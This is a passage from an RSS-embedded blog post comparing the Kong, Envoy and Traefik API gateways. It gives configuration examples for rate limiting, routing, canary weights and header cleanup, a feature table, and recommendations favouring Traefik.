        &lt;span class="na"&gt;endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;lb_endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;endpoint&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                  &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                    &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                      &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;user-api&lt;/span&gt;
                      &lt;span class="na"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3000&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
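&lt;p&gt;Kong's rate-limiting plugin has an Envoy counterpart in the &lt;code&gt;local_ratelimit&lt;/code&gt; HTTP filter, which must be listed before the router filter. A sketch of roughly 100 requests/minute based on Envoy's &lt;code&gt;LocalRateLimit&lt;/code&gt; proto — the token-bucket numbers are illustrative:&lt;/p&gt;

```yaml
# Add under http_filters, ahead of envoy.filters.http.router.
# Token bucket: 100 tokens refilled every 60s ≈ 100 req/min.
- name: envoy.filters.http.local_ratelimit
  typed_config:
    "@type": type.googleapis.com/envoy.extensions.filters.http.local_ratelimit.v3.LocalRateLimit
    stat_prefix: http_local_rate_limiter
    token_bucket:
      max_tokens: 100
      tokens_per_fill: 100
      fill_interval: 60s
    filter_enabled:           # evaluate the filter for 100% of requests
      default_value:
        numerator: 100
        denominator: HUNDRED
    filter_enforced:          # enforce (not just report) for 100%
      default_value:
        numerator: 100
        denominator: HUNDRED
```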



&lt;h3&gt;
  
  
  Traefik: The Docker-Native Gateway
&lt;/h3&gt;

&lt;p&gt;Traefik auto-discovers services from Docker, Kubernetes, and other providers. No config files needed — just labels.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Service with Traefik labels&lt;/span&gt;
&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;user-api&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;user-api:latest&lt;/span&gt;
    &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.enable=true"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.http.routers.user-api.rule=Host(`api.example.com`)&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;PathPrefix(`/api/users`)"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.http.routers.user-api.entrypoints=web"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.http.services.user-api.loadbalancer.server.port=3000"&lt;/span&gt;
      &lt;span class="c1"&gt;# Rate limiting middleware&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.http.middlewares.user-ratelimit.ratelimit.average=100"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.http.middlewares.user-ratelimit.ratelimit.burst=50"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.http.routers.user-api.middlewares=user-ratelimit"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
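&lt;p&gt;The labels above only take effect once Traefik itself knows about the &lt;code&gt;web&lt;/code&gt; entrypoint and the Docker provider. A minimal static configuration sketch — &lt;code&gt;exposedByDefault: false&lt;/code&gt; is why each service needs an explicit &lt;code&gt;traefik.enable=true&lt;/code&gt;:&lt;/p&gt;

```yaml
# traefik.yml — static configuration assumed by the labels above.
entryPoints:
  web:
    address: ":80"
providers:
  docker:
    # require explicit traefik.enable=true on each container
    exposedByDefault: false
api:
  dashboard: true   # the built-in dashboard noted in the comparison table
```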



&lt;h2&gt;
  
  
  Feature Comparison
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;Kong&lt;/th&gt;
&lt;th&gt;Envoy&lt;/th&gt;
&lt;th&gt;Traefik&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Config method&lt;/td&gt;
&lt;td&gt;Admin API / DB&lt;/td&gt;
&lt;td&gt;YAML / xDS API&lt;/td&gt;
&lt;td&gt;Docker labels / YAML&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Service discovery&lt;/td&gt;
&lt;td&gt;DNS, Consul&lt;/td&gt;
&lt;td&gt;DNS, EDS&lt;/td&gt;
&lt;td&gt;Docker, K8s, Consul&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rate limiting&lt;/td&gt;
&lt;td&gt;Plugin (built-in)&lt;/td&gt;
&lt;td&gt;Filter (built-in)&lt;/td&gt;
&lt;td&gt;Middleware (built-in)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Authentication&lt;/td&gt;
&lt;td&gt;JWT, OAuth2, LDAP, mTLS&lt;/td&gt;
&lt;td&gt;JWT, ext_authz&lt;/td&gt;
&lt;td&gt;ForwardAuth, BasicAuth&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Load balancing&lt;/td&gt;
&lt;td&gt;Round-robin, hash, least-conn&lt;/td&gt;
&lt;td&gt;6+ algorithms&lt;/td&gt;
&lt;td&gt;Round-robin, WRR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Circuit breaking&lt;/td&gt;
&lt;td&gt;Plugin&lt;/td&gt;
&lt;td&gt;Built-in&lt;/td&gt;
&lt;td&gt;Built-in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WebSocket&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;gRPC&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Native&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WASM extensibility&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Plugin ecosystem&lt;/td&gt;
&lt;td&gt;100+ plugins&lt;/td&gt;
&lt;td&gt;WASM + Lua filters&lt;/td&gt;
&lt;td&gt;Middlewares + plugins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory footprint&lt;/td&gt;
&lt;td&gt;~200MB (+DB)&lt;/td&gt;
&lt;td&gt;~50MB&lt;/td&gt;
&lt;td&gt;~30MB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Config complexity&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dashboard&lt;/td&gt;
&lt;td&gt;Kong Manager (paid)&lt;/td&gt;
&lt;td&gt;No (use Kiali)&lt;/td&gt;
&lt;td&gt;Built-in (free)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;A reverse proxy terminates TLS, routes requests by hostname, and load-balances across backend services.&lt;/p&gt;

&lt;h2&gt;
  
  
  API Gateway Patterns
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Pattern 1: Backend for Frontend (BFF)
&lt;/h3&gt;

&lt;p&gt;Route different clients to different backend compositions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Mobile App  → /mobile/*  → Mobile BFF → [User, Order, Payment]
Web App     → /web/*     → Web BFF    → [User, Order, Catalog]
Admin Panel → /admin/*   → Admin BFF  → [User, Analytics, Config]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
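&lt;p&gt;With Traefik's Docker-label discovery, the BFF split above could be sketched like this (service names and images are hypothetical):&lt;/p&gt;

```yaml
# docker-compose.yml (fragment) — one router per BFF, matched by path prefix
services:
  mobile-bff:
    image: example/mobile-bff        # hypothetical image
    labels:
      - "traefik.enable=true"
      - "traefik.http.routers.mobile-bff.rule=PathPrefix(`/mobile`)"
  web-bff:
    image: example/web-bff           # hypothetical image
    labels:
      - "traefik.enable=true"
      - "traefik.http.routers.web-bff.rule=PathPrefix(`/web`)"
  admin-bff:
    image: example/admin-bff         # hypothetical image
    labels:
      - "traefik.enable=true"
      - "traefik.http.routers.admin-bff.rule=PathPrefix(`/admin`)"
```

&lt;p&gt;Each BFF then fans out to its own set of backend services internally; the gateway only needs to know the path prefix.&lt;/p&gt;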



&lt;h3&gt;
  
  
  Pattern 2: API Versioning
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/api/v1/users → user-service-v1 (weight: 100%)
/api/v2/users → user-service-v2 (weight: 100%)
/api/v3/users → user-service-v2 (weight: 90%) + user-service-v3 (weight: 10%)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
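&lt;p&gt;The 90/10 canary split for &lt;code&gt;/api/v3&lt;/code&gt; maps directly onto Traefik's weighted round-robin services. A minimal file-provider sketch (service names are hypothetical, and each named service must be defined elsewhere with its own &lt;code&gt;loadBalancer&lt;/code&gt;):&lt;/p&gt;

```yaml
# dynamic.yml (fragment) — weighted split for the /api/v3 canary
http:
  routers:
    users-v3:
      rule: "PathPrefix(`/api/v3/users`)"
      service: users-v3-canary
  services:
    users-v3-canary:
      weighted:
        services:
          - name: user-service-v2    # hypothetical service name
            weight: 90
          - name: user-service-v3    # hypothetical service name
            weight: 10
```

&lt;p&gt;Shifting traffic to v3 is then a one-line weight change rather than a redeploy.&lt;/p&gt;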



&lt;h3&gt;
  
  
  Pattern 3: Rate Limiting Tiers
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Free tier:     100 requests/minute
Pro tier:      1,000 requests/minute
Enterprise:    10,000 requests/minute
Internal:      No limit
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
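&lt;p&gt;In Traefik, each tier can be expressed as its own &lt;code&gt;rateLimit&lt;/code&gt; middleware and attached to the matching router. Note that mapping a &lt;em&gt;customer&lt;/em&gt; to a tier (e.g. by API key) is not built in; you would pair this with ForwardAuth or a plugin. A sketch:&lt;/p&gt;

```yaml
# dynamic.yml (fragment) — one rateLimit middleware per pricing tier
http:
  middlewares:
    free-tier:
      rateLimit:
        average: 100       # requests allowed per period
        period: 1m
    pro-tier:
      rateLimit:
        average: 1000
        period: 1m
    enterprise-tier:
      rateLimit:
        average: 10000
        period: 1m
```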



&lt;h3&gt;
  
  
  Pattern 4: Request Transformation
&lt;/h3&gt;

&lt;p&gt;Transform requests before they hit your services:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client sends:  GET /api/users/123
Gateway adds:  X-Request-ID, X-Correlation-ID headers
Gateway strips: Cookie, Authorization (after auth check)
Backend gets:  Clean request with validated context
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
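&lt;p&gt;The static parts of this transformation fit Traefik's &lt;code&gt;headers&lt;/code&gt; middleware: setting a request header to an empty value removes it, and fixed headers can be added. Per-request values such as &lt;code&gt;X-Request-ID&lt;/code&gt; are not generated by this middleware; that needs a plugin or the backend itself. A sketch (the marker header is hypothetical):&lt;/p&gt;

```yaml
# dynamic.yml (fragment) — headers middleware for request cleanup
http:
  middlewares:
    clean-request:
      headers:
        customRequestHeaders:
          Cookie: ""                 # empty value strips the header
          X-Internal-Gateway: "1"    # hypothetical marker added for backends
```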



&lt;p&gt;Microservices architecture: independent services communicate through an API gateway and event bus.&lt;/p&gt;

&lt;h2&gt;
  
  
  Our Recommendation
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Choose Kong when&lt;/strong&gt;: You need a full API management platform with a plugin ecosystem, have a dedicated API team, need advanced auth (OAuth2 flows, LDAP), or want a commercial support option.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Choose Envoy when&lt;/strong&gt;: You need maximum performance and programmability, are building a service mesh, need WASM extensibility, or are running at very high scale (100K+ RPS).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Choose Traefik when&lt;/strong&gt;: You run Docker or Kubernetes, want zero-config service discovery, prefer simplicity over features, or are a small-to-medium team without dedicated API infrastructure engineers.&lt;/p&gt;

&lt;p&gt;At TechSaaS, we use Traefik for everything. It handles our 50+ services with Docker label discovery, and its ~30MB memory footprint means it barely registers on our resource monitoring. For most teams, Traefik's simplicity and Docker integration beat the feature richness of Kong or Envoy.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
  </channel>
</rss>
